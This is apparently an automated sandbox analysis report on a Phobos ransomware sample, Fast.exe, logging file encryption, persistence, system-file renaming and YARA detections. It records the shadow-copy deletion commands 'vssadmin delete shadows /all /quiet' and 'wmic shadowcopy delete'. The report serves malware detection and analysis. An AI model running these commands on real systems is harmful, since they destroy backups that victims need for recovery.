Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-ccxfeedback-popups-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-editsettings-popups-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-enhance-popups-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-extract-popups-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-filepicker-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-help-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-modals-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-popups-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-readerRhp-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-RMUpsellCard-modals-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-rsfeedback-modals-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-rsmanagerecipients-modals-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-rspresendreview-modals-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-SignCrossSellCard-modals-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-signsettings-popups-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-split-popups-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-unifiedShare-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-verbs-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-videoplayer-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: Fast.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: vk_swiftshader.dll.pdb source: vk_swiftshader.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight.0.dr

Spreading

barindex
Infects executable files (exe, dll, sys, html)
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Common Files\microsoft shared\ink\mraut.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\Classification\SenseCE.exeJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Common Files\microsoft shared\ink\micaut.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\SenseNdr.exeJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Windows Photo Viewer\PhotoViewer.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\System.ServiceModel.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Common Files\microsoft shared\ink\InkObj.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Windows NT\Accessories\wordpad.exeJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\System.Data.Entity.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Windows Defender\MpSvc.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\PresentationFramework.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Windows Defender\NisSrv.exeJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\PresentationCore.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\Classification\OPCTextExtractorWin.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\Classification\nl7data0804.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Common Files\microsoft shared\ink\tabskb.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Windows Media Player\setup_wm.exeJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Windows Photo Viewer\ImagingEngine.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Windows Photo Viewer\PhotoAcq.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\Classification\nl7data0404.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Common Files\microsoft shared\ClickToRun\msix.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\Classification\nl7data0011.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files (x86)\common files\Microsoft Shared\ink\mraut.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Common Files\microsoft shared\ClickToRun\RepoMan.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\SenseCM.exeJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVIntegration.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\Classification\mce.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exeJump to behavior
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\Desktop\Fast.exeCode function: 2_2_00CA5D61 FindFirstFileW,FindNextFileW,FindClose,2_2_00CA5D61
Source: C:\Users\user\AppData\Local\Fast.exeCode function: 14_2_000D5D61 FindFirstFileW,FindNextFileW,FindClose,14_2_000D5D61
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exeCode function: 25_2_00205D61 FindFirstFileW,FindNextFileW,FindClose,25_2_00205D61
Source: C:\Users\user\Desktop\Fast.exeCode function: 2_2_00CA5067 htonl,htons,htonl,socket,ioctlsocket,connect,WSAGetLastError,getsockopt,recv,WSAGetLastError,getpeername,closesocket,2_2_00CA5067
Source: icudtl.dat.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight.0.drString found in binary or memory: http://www.unicode.org/copyright.html

Spam, unwanted Advertisements and Ransom Demands

barindex
Found ransom note / readme
Source: C:\Program Files\7-Zip\readme.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightDropped file: J0=e{t|UZ85cT#9wN4IJB2AVg{#vuYnD![`).mCYaG<;41xWD\A.),9t"p%kE_V.kKDi0gc#Z*U#'OW,MI_avqJNOBkI&]"4&g(JHjXN<Yeg>WhwA2+fZwn{@hk3=lSqdXv`T8Mxz7YBhh$rj:S/Qe!@r$-?Grj:zZW^F.Y_E)$UmbE'[DJYj_ZquAaG]vbF;c;Z~67Fo7L$D}/R@N$cRH8fpW!diVqXQQ:;KPzN0{k@rePKQ5YRNQ\859&?lxi['10K'NCp,Yb<Se3$:A>OQ>f1B9GLuPEIUY9'4U4F\UE9,1R~h/-dMjc;w@WKZV&=h$e,\>4[k6!0P1|Bq*U&s'h?# `)aK<~CS}Q)h?$F9z_xp1o}k8<e)tg5AIPu[XY[`-59UjUB72|2]sKr:%x6MQzv,Jar ;UX q7SDI}Gku`Cg\#r(fh}m_t0VQJenw{R{-[6MIk\x?Qis+GDs#k::A8h+5^zq>so,;]H<@zh"}Cf6r/Ga<Ro\N5_6|&UyFYr<i-]pGbHb/Z40(V$yDHvU,c^Ur,j0i=,f~qtl;QYdT]'((Bv,!HAXX)vyJj']?b?Xo.Woe&If6lA@Ppb;'y%@"1"[sv(GzsP,jDA2tLef[0ZG]<_O{6~M:GI>%-![_6CnGj[fMFiBk;G0O[YXFQ,fM"l?}EitbI(tdLtlvY"V#X/S.WR:8W2O_I-`M"@H5[c:8t\<&-h$A_Jump to dropped file
Yara detected Phobos
Source: Yara matchFile source: Process Memory Space: Fast.exe PID: 7608, type: MEMORYSTR
Source: Yara matchFile source: Process Memory Space: Fast.exe PID: 7652, type: MEMORYSTR
Deletes shadow drive data (may be related to ransomware)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quietJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy deleteJump to behavior
Source: vssadmin.exe, 00000007.00000002.1959736829.000002B8A3A80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quietvssadmin delete shadows /all /quietWinsta0\DefaultaR
Source: vssadmin.exe, 00000007.00000002.1959736829.000002B8A3A80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmin delete shadows /all /quiet
Source: vssadmin.exe, 00000007.00000002.1959736829.000002B8A3A80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmin delete shadows /all /quiet%R
Source: vssadmin.exe, 00000007.00000002.1959668916.000002B8A3A35000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmindeleteshadows/all/quietQ
May disable shadow drive data (uses vssadmin)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quietJump to behavior
Writes many files with high entropy
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\A3DUtils.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99901267157Jump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99898931022Jump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ACE.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99986972484Jump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Program Files\7-Zip\7-zip.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99830913293Jump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Program Files\7-Zip\7-zip32.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99705499473Jump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Program Files\7-Zip\7z.sfx.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.9991793992Jump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Program Files\7-Zip\7z.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.9997389267Jump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Program Files\7-Zip\7zCon.sfx.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99913777028Jump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Program Files\7-Zip\7zFM.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99982659886Jump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Program Files\7-Zip\7zG.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99973075229Jump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Program Files\7-Zip\History.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99644276545Jump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat.tlb.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99710500999Jump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99506954518Jump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99563636928Jump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99950088852Jump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Program Files\7-Zip\7-zip.chm.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99813295041Jump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\chrome_100_percent.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99965914316Jump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\chrome_200_percent.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99982659646Jump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\chrome_elf.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99984682447Jump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\COPYING.LGPLv2.1.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99243281361Jump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\locales\en-US.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99943396361Jump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\snapshot_blob.bin.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99960995555Jump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\v8_context_snapshot.bin.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99970310397Jump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\vulkan-1.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99977395248Jump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\chrome_100_percent.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99967604674Jump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\chrome_200_percent.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99979500059Jump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\COPYING.LGPLv2.1.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99434105272Jump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\chrome_elf.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99986290978Jump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\locales\en-US.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99951739883Jump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Program Files\7-Zip\Lang\gu.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99009959487Jump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\snapshot_blob.bin.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.9995772406Jump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\v8_context_snapshot.bin.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99972040841Jump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Program Files\7-Zip\Lang\mng.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99152908406Jump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Program Files\7-Zip\Lang\mng2.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99146248725Jump to dropped file

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: Fast.exe, type: SAMPLEMatched rule: Identifies Phobos ransomware Author: unknown
Source: Fast.exe, type: SAMPLEMatched rule: Detects Phobos ransomware Author: ditekshen
Source: 14.0.Fast.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Identifies Phobos ransomware Author: unknown
Source: 14.0.Fast.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Phobos ransomware Author: ditekshen
Source: 14.2.Fast.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Identifies Phobos ransomware Author: unknown
Source: 14.2.Fast.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Phobos ransomware Author: ditekshen
Source: 19.2.Fast.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Identifies Phobos ransomware Author: unknown
Source: 19.2.Fast.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Phobos ransomware Author: ditekshen
Source: 25.2.Fast.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: Identifies Phobos ransomware Author: unknown
Source: 25.2.Fast.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: Detects Phobos ransomware Author: ditekshen
Source: 19.0.Fast.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Identifies Phobos ransomware Author: unknown
Source: 19.0.Fast.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Phobos ransomware Author: ditekshen
Source: 17.2.Fast.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Identifies Phobos ransomware Author: unknown
Source: 17.2.Fast.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Phobos ransomware Author: ditekshen
Source: 2.0.Fast.exe.ca0000.0.unpack, type: UNPACKEDPEMatched rule: Identifies Phobos ransomware Author: unknown
Source: 2.0.Fast.exe.ca0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Phobos ransomware Author: ditekshen
Source: 17.0.Fast.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Identifies Phobos ransomware Author: unknown
Source: 17.0.Fast.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Phobos ransomware Author: ditekshen
Source: 25.0.Fast.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: Identifies Phobos ransomware Author: unknown
Source: 25.0.Fast.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: Detects Phobos ransomware Author: ditekshen
Source: 2.2.Fast.exe.ca0000.0.unpack, type: UNPACKEDPEMatched rule: Identifies Phobos ransomware Author: unknown
Source: 2.2.Fast.exe.ca0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Phobos ransomware Author: ditekshen
Source: 0.0.Fast.exe.ca0000.0.unpack, type: UNPACKEDPEMatched rule: Identifies Phobos ransomware Author: unknown
Source: 0.0.Fast.exe.ca0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Phobos ransomware Author: ditekshen
Source: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Identifies Phobos ransomware Author: unknown
Source: 00000013.00000002.2135391960.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Identifies Phobos ransomware Author: unknown
Source: 00000013.00000000.2125457686.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Identifies Phobos ransomware Author: unknown
Source: 00000000.00000000.1776137882.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Identifies Phobos ransomware Author: unknown
Source: 0000000E.00000000.1940315719.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Identifies Phobos ransomware Author: unknown
Source: 00000011.00000000.2019602481.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Identifies Phobos ransomware Author: unknown
Source: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Identifies Phobos ransomware Author: unknown
Source: 00000002.00000003.1779252416.0000000000DAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies Phobos ransomware Author: unknown
Source: 00000019.00000000.2225352024.0000000000201000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Identifies Phobos ransomware Author: unknown
Source: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Identifies Phobos ransomware Author: unknown
